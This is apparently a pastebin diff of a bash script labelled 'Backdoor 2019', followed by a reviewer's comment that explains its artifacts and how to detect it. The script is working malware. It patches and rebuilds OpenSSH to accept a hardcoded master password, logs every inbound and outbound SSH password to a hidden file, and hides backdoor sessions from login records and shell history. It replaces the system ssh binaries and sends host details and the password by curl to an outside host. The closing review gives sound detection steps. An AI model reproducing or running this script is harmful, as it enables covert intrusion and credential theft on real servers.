View difference between Paste ID: VvfThNyJ and SKxGLh5t
1
#!/bin/bash
2
#Backdoor 2019 [Qadimoun]
3
4
sysctl -w net.ipv6.conf.all.disable_ipv6=1
5
sysctl -w net.ipv6.conf.default.disable_ipv6=1
6
7
# Set global recursive dns for non-failure backdoor tools hosts resolution.
8
echo '[Q] Resetting resolv.conf'
9
echo 'nameserver 8.8.8.8' >/etc/resolv.conf
10
# Install Gcc and reqs..
11
yum install gcc make -y
12
apt-get install gcc make -y
13
yum install gcc openssl-devel libz libz-devel -y
14
apt-get install openssl-dev libz libz-dev -y
15
# Let the fun start
16
DIST=`cat /etc/issue |head -1 |cut -d " " -f 1`
17
CPU1=`cat /proc/cpuinfo |grep processor |tail -1 |cut -d ":" -f 2 |cut -d " " -f 2`
18
CPU2=`echo 1`
19
CPU=$((CPU1 + CPU2))
20
MEM=`free -m |head -2 |tail -1 |cut -d ":" -f 2 |sed -n '/ /s/  */ /gp' |cut -d " " -f 2`
21
STORAGE=`df --total |sed -n '/ /s/  */ /gp'|cut -d " " -f 2 |grep -v blocks |awk '{s+=$1} END {print s}' |awk '{ byte =$1 /1024/1024; print byte "GB" }'`
22
23
PASSWORD=`shuf -i 1-10000000000000000000 -n 1`
24
SNIFFILE='/usr/local/.logs'
25
#curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST
26
27
BACKDOOR_INC="patch.h"
28
FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h"
29
#HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/"
30
HOST="http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/"
31
OK="OK"
32
FAIL="Failed"
33
 
34
echo "ENJOY..."
35
if [ -z $PASSWORD ]; then
36
	echo $PASSWORD | md5sum |cut -d " " -f 1
37
fi
38
 
39
if [ -z $SNIFFILE ]; then
40
echo -n ">>> logfile path: /usr/local/include/uconf.h"
41
SNIFFILE="/usr/local/include/uconf.h"
42
touch "/usr/local/include/uconf.h"
43
chmod o+wr "/usr/local/include/uconf.h"
44
echo "Do not remove /usr/local/include/uconf.h"
45
fi
46
 
47
echo -n "checking for sshd_config...    "
48
SSHDCONFIG="/etc/ssh"
49
if [ -f $SSHDCONFIG/sshd_config ]; then
50
        echo "$OK  ($SSHDCONFIG)"
51
fi
52
 
53
if [ -z "$SSHDCONFIG" ]; then
54
        echo "$FAIL"
55
        echo -n ">>> sshd_config path: "
56
fi
57
 
58
# ssh
59
echo -n "checking for OpenSSH binary... "
60
SSH=$(which ssh)
61
if [ -z "$SSH" ]; then
62
        echo "$FAIL"
63
        exit
64
fi
65
echo "$OK  ($SSH)"
66
 
67
# wget
68
echo -n "checking for wget/curl binary... "
69
WGET=$(which curl)
70
WGET_FLAG="-O"
71
if [ -z "$WGET" ]; then
72
        WGET=$(which wget)
73
        if [ -z "$WGET" ]; then
74
                echo "$FAIL"
75
                exit
76
        else
77
                WGET_FLAG="-qc"
78
        fi
79
fi
80
echo "   $OK  ($WGET)"
81
 
82
# check ssh version
83
echo -n "checking OpenSSH version... "
84
SSH_VERSION=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/')
85
SSH_DISTRO=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/'|awk '{print $2}')
86
SSH_SHORT_VERSION=$(echo $SSH_VERSION | sed -e's/OpenSSH_\(.*\)/\1/' -e 's/\ .*//')
87
if [ -z "$SSH_SHORT_VERSION" ] || [ -z "$SSH_VERSION" ]; then
88
        echo $FAIL;
89
        exit
90
fi
91
echo "   $OK  ($SSH_VERSION)"
92
 
93
 
94
# get ssh
95
OPENSSH=$(echo openssh-$SSH_SHORT_VERSION)
96
echo "downloading source..."
97
$WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz &&
98
#echo "          $OK" &&
99
echo -n "extracting tarball..." &&
100
tar xzf $OPENSSH.tar.gz &&
101
echo "          $OK" &&
102
cd $OPENSSH
103
 
104
 
105
# check file sanity
106
echo -n "checking file sanity..."
107
for FILE in $FILES; do
108
        if [ ! -f $FILE ];then
109
                printf "$FILE not found.\n"
110
                exit
111
        fi
112
        cp $FILE $FILE.bak
113
done
114
echo "        $OK"
115
 
116
echo "generating patches..."
117
BACKDOOR_BUF=\
118
"#ifndef __HAVE_PATCH_H
119
#define __HAVE_PATCH_H
120
#define PATCHPASS \"$PASSWORD\"
121
#define SNFLOG \"$SNIFFILE\"
122
int patch_on;
123
#endif"
124
printf "$BACKDOOR_BUF" > $BACKDOOR_INC
125
 
126
 
127
# patch files
128
echo "  patching auth.c...           $OK"
129
sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp
130
echo "  patching loginrec.c...       $OK"
131
sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp
132
echo "  patching auth-passwd.c...    $OK"
133
sed -e '/options.permit_empty_passwd/{n; s/.*/&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/.*/\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/.*/\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp
134
echo " patching session.c...             $OK"
135
sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp
136
echo "  patching sshconnect1.c...    $OK"
137
sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/.*/packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp
138
echo "  patching sshconnect2.c...    $OK"
139
LINENUMBER=$(cat sshconnect2.c|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'|awk -F ":" '{print $1}'|head -3|tail -1)
140
sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp
141
echo "  patching includes.h...    $OK"
142
sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp
143
 
144
 
145
# move files
146
for FILE in $FILES; do
147
        mv $FILE.tmp $FILE
148
done
149
echo "done."
150
echo "building source..."
151
 
152
echo
153
echo Variables:
154
echo " \$SSH_VERSION  =  $SSH_VERSION"
155
echo " \$SSHDCONFIG   = $SSHDCONFIG"
156
echo " \$PASSWORD     = $PASSWORD"
157
 
158
SSH_PORTABLE=$(cat version.h|grep PORTABLE|head -1|awk -F '"' '{print $2}')
159
if [ -z $SSH_DISTRO ]; then
160
echo "Keeping current version.h"
161
else
162
echo "SSH Distro: $SSH_DISTRO"
163
sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp
164
rm -rf version.h
165
mv version.h.tmp version.h
166
fi
167
 
168
# start build
169
USEPAM=`cat /etc/ssh/sshd_config|grep -i usepam`
170
cat /etc/ssh/sshd_config|grep -i GSSAPICleanupCredentials
171
if [ -z $USEPAM ];then
172
echo "Configuring --with-pam"
173
OPT_PAM=""
174
else
175
echo "Configuring without PAM"
176
OPT_PAM=""
177
fi
178
if [ -z $KERB ]; then
179
echo "Configuring --with-kerberos5"
180
OPT_KERB=""
181
else
182
echo "Configuring without kerb5"
183
OPT_KERB=""
184
fi
185
echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB"
186
./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd sftp
187
 
188
printf "patched OpenSSH ready.\n"
189
mv sshd /usr/sbin/sshd
190
mv ssh /usr/bin/ssh
191
mv sftp /usr/bin/sftp
192
service sshd restart
193
curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST
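Review bot: The listing has no header comment stating what it leaves on a host, and those artifacts are what a responder needs from it: the sed edits to auth-passwd.c make sshd accept the `PATCHPASS` value from the generated `patch.h` as a password and append the source address, user name and password of each successful login to `SNFLOG`, set here to `/usr/local/.logs` (the `/usr/local/include/uconf.h` branch is not reached as written, because `SNIFFILE` is assigned just above it). The edits to auth.c, loginrec.c and session.c appear intended to skip the "Accepted" log line and the login record and to point `HISTFILE` at `/dev/null` for those sessions, so auth logs, wtmp and shell history cannot be relied on to show them, and the patched ssh client writes outbound passwords to the same file with a `To:` prefix. I would put a comment at the top along the lines of `# Artifacts: /usr/local/.logs, rebuilt /usr/sbin/sshd /usr/bin/ssh /usr/bin/sftp, /etc/resolv.conf set to 8.8.8.8, IPv6 disabled via sysctl, GET to patti-taylor.co.uk/get.php`. For detection, compare the three binaries against package-manager checksums (`rpm -V openssh-server openssh-clients`, `debsums openssh-server openssh-client`), look for an unexpected gcc/make install followed by an `openssh-*.tar.gz` fetch over plain HTTP, and search proxy and DNS logs for the final `curl`, which carries the generated password in the `p=` query parameter.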